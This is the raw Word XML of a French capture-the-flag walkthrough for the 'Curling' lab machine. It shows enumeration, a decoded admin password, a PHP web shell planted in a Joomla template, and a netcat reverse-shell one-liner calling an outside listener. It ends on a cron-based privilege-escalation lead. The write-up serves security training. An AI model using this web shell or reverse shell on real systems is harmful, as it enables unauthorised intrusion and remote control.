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4124" w14:textId="1EAD3706" w:rsidR="00224780" w:rsidRDefault="0043353B" w:rsidP="0043353B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="398135A5" wp14:editId="2CF3C3D9">
            <wp:extent cx="5400675" cy="3000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6D3" w14:textId="74BB1EF3" w:rsidR="0043353B" w:rsidRDefault="0043353B"/>
    <w:p w14:paraId="499F4BAF" w14:textId="2D8692CB" w:rsidR="0043353B" w:rsidRPr="00EE148C" w:rsidRDefault="0043353B" w:rsidP="00EE148C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE148C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBA3729" w14:textId="5ABE1791" w:rsidR="0043353B" w:rsidRDefault="0043353B"/>
    <w:p w14:paraId="499AF98E" w14:textId="6B8D6225" w:rsidR="002F1389" w:rsidRDefault="002F1389">
      <w:r>
        <w:t>Curling est une box Linux dont l’adresse IP est 10.10.10.150.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB0461" w14:textId="4C53E924" w:rsidR="002F1389" w:rsidRDefault="002F1389">
      <w:r>
        <w:t>Compétences mises en œuvre :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A23D6CE" w14:textId="0A37DC9B" w:rsidR="002F1389" w:rsidRDefault="002F1389" w:rsidP="002F1389">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumération </w:t>
      </w:r>
      <w:r w:rsidR="001E13F3">
        <w:t>des ports et services d’une machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDDFB84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E049773" w14:textId="79B2EA93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Enumération initiale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0891D310" w14:textId="4C06B8A3" w:rsidR="0043353B" w:rsidRDefault="0043353B"/>
    <w:p w14:paraId="38E635D5" w14:textId="16000A72" w:rsidR="00893EFB" w:rsidRDefault="00893EFB">
      <w:r>
        <w:t xml:space="preserve">Nous commençons par l’énumération des ports et services ouverts avec </w:t>
      </w:r>
      <w:r w:rsidRPr="008B5C42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93EFB" w14:paraId="628D83A6" w14:textId="77777777" w:rsidTr="00A601A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="07AF138C" w14:textId="5A5B9A40" w:rsidR="00893EFB" w:rsidRDefault="00893EFB">
            <w:r>
              <w:t>Nmap -T4 -A 10.10.10.150</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A9D7801" w14:textId="5686E5AA" w:rsidR="00893EFB" w:rsidRDefault="00893EFB"/>
    <w:p w14:paraId="10259A41" w14:textId="65E8C4B1" w:rsidR="00596860" w:rsidRDefault="00596860">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4744255B" wp14:editId="134F215B">
            <wp:extent cx="5760720" cy="18268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ACF1" w14:textId="695C0324" w:rsidR="003B05E6" w:rsidRDefault="003B05E6">
      <w:r>
        <w:t>Pour l’énumération initiale, nous allons également faire l’énumération du site web</w:t>
      </w:r>
      <w:r w:rsidR="008B5C42">
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:r w:rsidR="008B5C42" w:rsidRPr="00673A71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dirsearch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A79A7" w:rsidRPr="00D139B5" w14:paraId="79CC9DCE" w14:textId="77777777" w:rsidTr="00CC2B12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="2DADA62B" w14:textId="2D61B3ED" w:rsidR="008A79A7" w:rsidRPr="00BD5DFB" w:rsidRDefault="008A79A7" w:rsidP="00BD5DFB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1599"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD5DFB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$ dirsearc</w:t>
            </w:r>
            <w:r w:rsidR="00BD5DFB" w:rsidRPr="00BD5DFB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>h -x 403 -w wordlist -f</w:t>
            </w:r>
            <w:r w:rsidR="00BD5DFB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -t 100 -e </w:t>
            </w:r>
            <w:r w:rsidR="00BD5DFB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"html,php</w:t>
            </w:r>
            <w:r w:rsidR="00BD5DFB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>" -u http://10.10.10.150/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="564AF370" w14:textId="4757B7A1" w:rsidR="008A79A7" w:rsidRPr="00D139B5" w:rsidRDefault="008A79A7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B2C67EB" w14:textId="75B773C9" w:rsidR="00CC2B12" w:rsidRDefault="00CC2B12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E1E03B" wp14:editId="1E5ABB70">
            <wp:extent cx="5099395" cy="4211273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664" cy="42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A300" w14:textId="77777777" w:rsidR="00EE148C" w:rsidRDefault="00EE14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BC491D" w14:textId="6206E95E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utilisateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA7B5D6" w14:textId="69C90D55" w:rsidR="0043353B" w:rsidRDefault="0043353B"/>
    <w:p w14:paraId="611177F4" w14:textId="561AE470" w:rsidR="008B370D" w:rsidRDefault="008B370D">
      <w:r>
        <w:t xml:space="preserve">En visitant manuellement le site, les 3 articles qui apparaissent sont </w:t>
      </w:r>
      <w:r w:rsidR="002F1AE2">
        <w:t xml:space="preserve">publié par l’utilisateur </w:t>
      </w:r>
      <w:r w:rsidR="002F1AE2" w:rsidRPr="004539B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Super User</w:t>
      </w:r>
      <w:r w:rsidR="002F1AE2">
        <w:t xml:space="preserve">, il y a un article signé par </w:t>
      </w:r>
      <w:r w:rsidR="002F1AE2" w:rsidRPr="004539B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Floris</w:t>
      </w:r>
      <w:r w:rsidR="002F1AE2">
        <w:t>. En regardant la source HTML, nous pouvons voir quelque chose d’</w:t>
      </w:r>
      <w:r w:rsidR="00E73E16">
        <w:t>intéressant</w:t>
      </w:r>
      <w:r w:rsidR="002F1AE2">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25164073" w14:textId="43B0893F" w:rsidR="002F1AE2" w:rsidRDefault="00C75A27">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="211D86A3" wp14:editId="04C2E3F9">
            <wp:extent cx="1838325" cy="485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FBCB" w14:textId="21AA2EA4" w:rsidR="00C75A27" w:rsidRDefault="00C75A27">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3602BC31" wp14:editId="21FA7D6B">
            <wp:extent cx="3867150" cy="942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08F8" w14:textId="5BFDF453" w:rsidR="00C75A27" w:rsidRDefault="00CC2B12">
      <w:r>
        <w:t>Nous testons de le décoder en base 64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CC2B12" w:rsidRPr="00D139B5" w14:paraId="6C6992C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2F5BB633" w14:textId="0540819D" w:rsidR="00CC2B12" w:rsidRPr="00CC2B12" w:rsidRDefault="00CC2B12">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC2B12">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">$ curl -s </w:t>
            </w:r>
            <w:hyperlink r:id="rId10" w:history="1">
              <w:r w:rsidRPr="00720C4F">
                <w:rPr>
                  <w:rStyle w:val="Lienhypertexte"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://10.10.10.150/secret.txt</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> | base64 -d</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38930D03" w14:textId="2708D1D6" w:rsidR="00CC2B12" w:rsidRDefault="00CC2B12">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1866D74F" w14:textId="10432BA9" w:rsidR="00EC446C" w:rsidRDefault="00EC446C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CB10FF9" wp14:editId="3FBEA816">
            <wp:extent cx="5715000" cy="514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9CC" w14:textId="56F120D1" w:rsidR="00EC446C" w:rsidRDefault="00EC446C">
      <w:r w:rsidRPr="00EC446C">
        <w:t>Nous avons un mot d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e passe : </w:t>
      </w:r>
      <w:r w:rsidRPr="004539B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Curling2018!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B84D01B" w14:textId="40EE6A1F" w:rsidR="003242D3" w:rsidRDefault="003242D3">
      <w:r>
        <w:t xml:space="preserve">En nous rendant sur la page </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00720C4F">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://10.10.10.150/administrator/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> nous pouvons nous logger avec l’utilisateur Floris :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1569F68A" w14:textId="53C92633" w:rsidR="003242D3" w:rsidRDefault="003242D3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76A9DF17" wp14:editId="6DE05FD3">
            <wp:extent cx="3028950" cy="2714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8CD" w14:textId="35F8F61D" w:rsidR="003242D3" w:rsidRDefault="003242D3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78E3E664" wp14:editId="26E18D5D">
            <wp:extent cx="5760720" cy="1543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B65" w14:textId="17922B75" w:rsidR="003242D3" w:rsidRDefault="00303387">
      <w:r>
        <w:t xml:space="preserve">Pour avoir une RCE à partir de là, la manipulation va consister à rajouter un paramètre sur une page web déjà présente afin de passer des commandes </w:t>
      </w:r>
      <w:r w:rsidR="00694069">
        <w:t>pour obtenir une RCE :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE03EC0" w14:textId="7763B994" w:rsidR="00694069" w:rsidRDefault="00E64E85">
      <w:r>
        <w:t xml:space="preserve">Sur le home, à gauche, il faut aller dans </w:t>
      </w:r>
      <w:r w:rsidRPr="004539B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, puis </w:t>
      </w:r>
      <w:r w:rsidRPr="004539B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r>
        <w:t>, cliquer sur une page et rajouter le code PHP pour rajouter un paramètre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E64E85" w14:paraId="094F03E8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4303F15B" w14:textId="28FFED53" w:rsidR="00E64E85" w:rsidRDefault="00E64E85">
            <w:r>
              <w:t>System($_REQUEST[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>'cmd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:t>]) ;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69FAFBF3" w14:textId="372D09C2" w:rsidR="00085EA7" w:rsidRDefault="00085EA7">
      <w:r>
        <w:t>Cela fonctionne :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DC24E0" w14:textId="2C403555" w:rsidR="00085EA7" w:rsidRDefault="00085EA7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15BACABA" wp14:editId="39FFFAAB">
            <wp:extent cx="5391150" cy="2933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519" w14:textId="65DDAF88" w:rsidR="00085EA7" w:rsidRDefault="00085EA7">
      <w:r>
        <w:t xml:space="preserve">Maintenant nous mettons en place un listener netcat sur kali et nous </w:t>
      </w:r>
      <w:r w:rsidR="009645DB">
        <w:t>exécutons</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> le code bash suivant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085EA7" w:rsidRPr="009645DB" w14:paraId="0015848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0BA6263C" w14:textId="516313DF" w:rsidR="00085EA7" w:rsidRPr="009645DB" w:rsidRDefault="009645DB">
            <w:r w:rsidRPr="009645DB">
              <w:t xml:space="preserve">Curl </w:t>
            </w:r>
            <w:hyperlink r:id="rId16" w:history="1">
              <w:r w:rsidRPr="009645DB">
                <w:rPr>
                  <w:rStyle w:val="Lienhypertexte"/>
                </w:rPr>
                <w:t>http://10.10.10.150/index.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="009645DB">
              <w:t xml:space="preserve"> -G --data-urlencode </w:t>
            </w:r>
            <w:r w:rsidRPr="009645DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>'cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>c 10.10.14.37 4444 &gt;/tmp/f</w:t>
            </w:r>
            <w:r w:rsidRPr="009645DB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FA9CAA5" w14:textId="7B3EC4C5" w:rsidR="00085EA7" w:rsidRDefault="00085EA7"/>
    <w:p w14:paraId="320FC648" w14:textId="5770ECF0" w:rsidR="00FB09DC" w:rsidRDefault="00FB09DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7203315B" wp14:editId="04AF62E0">
            <wp:extent cx="5760720" cy="12947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D09" w14:textId="6536DFCD" w:rsidR="00FB09DC" w:rsidRDefault="00FB09DC"/>
    <w:p w14:paraId="0534A666" w14:textId="4129CC8C" w:rsidR="00EE0AC9" w:rsidRDefault="00EE0AC9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Nous pouvons avoir un TTY shell (</w:t>
      </w:r>
      <w:r w:rsidR="004C17F0">
        <w:t>nécessaire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pour utiliser sudo)</w:t>
      </w:r>
      <w:r w:rsidR="004C17F0">
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:r w:rsidR="004C17F0" w:rsidRPr="004539B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r w:rsidR="004C17F0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4C17F0" w:rsidRPr="00D139B5" w14:paraId="45739926" w14:textId="77777777" w:rsidTr="004539B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="1153586A" w14:textId="20643BFC" w:rsidR="004C17F0" w:rsidRPr="004C17F0" w:rsidRDefault="004C17F0">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C17F0">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">$ python3 -c </w:t>
            </w:r>
            <w:r w:rsidRPr="004C17F0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"import pty ;pty.spawn('/bin/bash')</w:t>
            </w:r>
            <w:r w:rsidRPr="004C17F0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B98DF50" w14:textId="405DEE57" w:rsidR="004C17F0" w:rsidRDefault="004C17F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8D577E" w14:textId="154915F8" w:rsidR="004C17F0" w:rsidRDefault="004C17F0">
      <w:r w:rsidRPr="004C17F0">
        <w:t>Malheureusement, le mot de p</w:t>
      </w:r>
      <w:r>
        <w:t>asse Curling2018! Ne fonctionne pas sur l’utilisateur floris, nous allons donc devoir chercher.</w:t>
      </w:r>
      <w:r w:rsidR="00C90AA6">
        <w:t xml:space="preserve"> Dans son home, le fichier </w:t>
      </w:r>
      <w:r w:rsidR="00C90AA6" w:rsidRPr="004539B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password_backup</w:t>
      </w:r>
      <w:r w:rsidR="00C90AA6">
        <w:t xml:space="preserve"> a l’air intéressant :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B841D7" w14:textId="42EA05BA" w:rsidR="00C90AA6" w:rsidRDefault="00C90AA6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75B6AB61" wp14:editId="7BD99029">
            <wp:extent cx="4514850" cy="619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81F2" w14:textId="7B0E56D4" w:rsidR="00DD3468" w:rsidRDefault="00DD3468">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CF15A1E" wp14:editId="78B2B673">
            <wp:extent cx="5760720" cy="33331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95C" w14:textId="7A572039" w:rsidR="00DD3468" w:rsidRDefault="00DD3468">
      <w:r>
        <w:t xml:space="preserve">Ceci a l’air d’être un dump Hex, nous pouvons alors le décoder avec </w:t>
      </w:r>
      <w:r w:rsidRPr="00390D22">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xxd</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00F8281F">
        <w:t xml:space="preserve">en bak </w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402CFC8C" w14:textId="568E5E9F" w:rsidR="00DD3468" w:rsidRDefault="00F8281F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ED0DEFE" wp14:editId="7DB3E582">
            <wp:extent cx="5760720" cy="4025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0AC" w14:textId="0860E19B" w:rsidR="00DD3468" w:rsidRDefault="004D4C5B">
      <w:r>
        <w:t xml:space="preserve">Les prochaines manipulations ne sont pas évidentes, puisqu’il s’agit enfaite d’une archive archivé 2 fois, après avoir passé beaucoup de temps, l’archive final nous donne </w:t>
      </w:r>
      <w:r w:rsidRPr="00390D22">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password.txt</w:t>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BBBAE6" w14:textId="6F81959C" w:rsidR="004D4C5B" w:rsidRDefault="004D4C5B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="768A0DF0" wp14:editId="2945A2C1">
            <wp:extent cx="3838575" cy="6762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729" w14:textId="670AE12B" w:rsidR="004D4C5B" w:rsidRDefault="004D4C5B">
      <w:r>
        <w:t xml:space="preserve">Et nous pouvons nous logger avec ce mot de passe </w:t>
      </w:r>
      <w:r w:rsidR="007D26FA">
        <w:t>en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D26FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>floris</w:t>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6885AA12" w14:textId="0B588652" w:rsidR="00EE148C" w:rsidRPr="004C17F0" w:rsidRDefault="00283D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621462" wp14:editId="444DD71E">
            <wp:extent cx="3170285" cy="105676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6466" cy="10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48C" w:rsidRPr="004C17F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED66CB3" w14:textId="5E010766" w:rsidR="0043353B" w:rsidRPr="00EE148C" w:rsidRDefault="0043353B" w:rsidP="00EE148C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE148C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Obtenir un accès administrateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F862DB" w14:textId="231C7D52" w:rsidR="0043353B" w:rsidRDefault="0043353B"/>
    <w:p w14:paraId="42C42920" w14:textId="1BD2BA20" w:rsidR="005965E2" w:rsidRDefault="005965E2">
      <w:r>
        <w:t>Nous transférons et exécutons psp64 sur la box pour une énumération scriptée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5E2" w14:paraId="2CF8BD60" w14:textId="77777777" w:rsidTr="005965E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ABA9D3D" w14:textId="77777777" w:rsidR="005965E2" w:rsidRDefault="005965E2">
            <w:r>
              <w:t>################################# Sur kali</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78598D6B" w14:textId="775CD8D2" w:rsidR="005965E2" w:rsidRDefault="005965E2">
            <w:r>
              <w:t xml:space="preserve">$ scp pspy64 </w:t>
            </w:r>
            <w:hyperlink r:id="rId23" w:history="1">
              <w:r w:rsidRPr="0092118E">
                <w:rPr>
                  <w:rStyle w:val="Lienhypertexte"/>
                </w:rPr>
                <w:t>floris@10.10.10.150:/tmp</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="009A1655" w14:textId="77777777" w:rsidR="005965E2" w:rsidRDefault="005965E2"/>
          <w:p w14:paraId="23D1A3D4" w14:textId="77777777" w:rsidR="005965E2" w:rsidRDefault="005965E2">
            <w:r>
              <w:t>################################# Sur curling</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D37EDEE" w14:textId="77777777" w:rsidR="005965E2" w:rsidRDefault="005965E2">
            <w:r>
              <w:t>$ cd /tmp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68DA38C1" w14:textId="77777777" w:rsidR="005965E2" w:rsidRDefault="005965E2">
            <w:r>
              <w:t>$ chmod +x pspy64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79A0E832" w14:textId="459A9F07" w:rsidR="005965E2" w:rsidRDefault="005965E2">
            <w:r>
              <w:t>$ ./pspy64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E3B0CAD" w14:textId="3F029B01" w:rsidR="005965E2" w:rsidRDefault="005965E2"/>
    <w:p w14:paraId="62013DD1" w14:textId="258B5790" w:rsidR="005965E2" w:rsidRDefault="005965E2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38161530" wp14:editId="55A7E865">
            <wp:extent cx="5760720" cy="13944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63A" w14:textId="5D965084" w:rsidR="005965E2" w:rsidRDefault="005965E2">
      <w:r>
        <w:t xml:space="preserve">Les processus ci-dessus reviennent fréquemment, </w:t>
      </w:r>
      <w:r w:rsidR="00DF385A">
        <w:t xml:space="preserve">si on analyse, on devine vite une tache cron qui execute curl sur </w:t>
      </w:r>
      <w:r w:rsidR="00562E16">
        <w:t>le fichier input</w:t>
      </w:r>
      <w:r w:rsidR="00DF385A">
        <w:t xml:space="preserve"> pour en faire un report, </w:t>
      </w:r>
      <w:r w:rsidR="00562E16">
        <w:t>input qui est modifiable par nos soin.</w:t>
      </w:r>
      <w:r w:rsidR="00DF385A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF1E900" w14:textId="77777777" w:rsidR="00AB7823" w:rsidRDefault="00AB7823"/>
    <w:p w14:paraId="16F606F0" w14:textId="75B9B5A6" w:rsidR="0043353B" w:rsidRDefault="009C2949">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="707A92E5" wp14:editId="4E6FD4C4">
            <wp:extent cx="5760720" cy="1880235"/>
            <wp:effectExtent l="0" t="0" r="0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AFF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54941060"/>
    <w:lvl w:ilvl="0" w:tplc="C372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E"/>
    <w:rsid w:val="00085EA7"/>
    <w:rsid w:val="001E13F3"/>
    <w:rsid w:val="00224780"/>
    <w:rsid w:val="00283D47"/>
    <w:rsid w:val="002F1389"/>
    <w:rsid w:val="002F1AE2"/>
    <w:rsid w:val="00303387"/>
    <w:rsid w:val="003242D3"/>
    <w:rsid w:val="00390D22"/>
    <w:rsid w:val="003B05E6"/>
    <w:rsid w:val="0043353B"/>
    <w:rsid w:val="004539B7"/>
    <w:rsid w:val="004C17F0"/>
    <w:rsid w:val="004D4C5B"/>
    <w:rsid w:val="00562E16"/>
    <w:rsid w:val="005965E2"/>
    <w:rsid w:val="00596860"/>
    <w:rsid w:val="00673A71"/>
    <w:rsid w:val="00694069"/>
    <w:rsid w:val="00714B19"/>
    <w:rsid w:val="007C4A7E"/>
    <w:rsid w:val="007D26FA"/>
    <w:rsid w:val="00893EFB"/>
    <w:rsid w:val="008A79A7"/>
    <w:rsid w:val="008B370D"/>
    <w:rsid w:val="008B5C42"/>
    <w:rsid w:val="00937284"/>
    <w:rsid w:val="009645DB"/>
    <w:rsid w:val="009C2949"/>
    <w:rsid w:val="00A601A2"/>
    <w:rsid w:val="00AB7823"/>
    <w:rsid w:val="00BD5DFB"/>
    <w:rsid w:val="00C75A27"/>
    <w:rsid w:val="00C90AA6"/>
    <w:rsid w:val="00CC2B12"/>
    <w:rsid w:val="00D139B5"/>
    <w:rsid w:val="00DD3468"/>
    <w:rsid w:val="00DF385A"/>
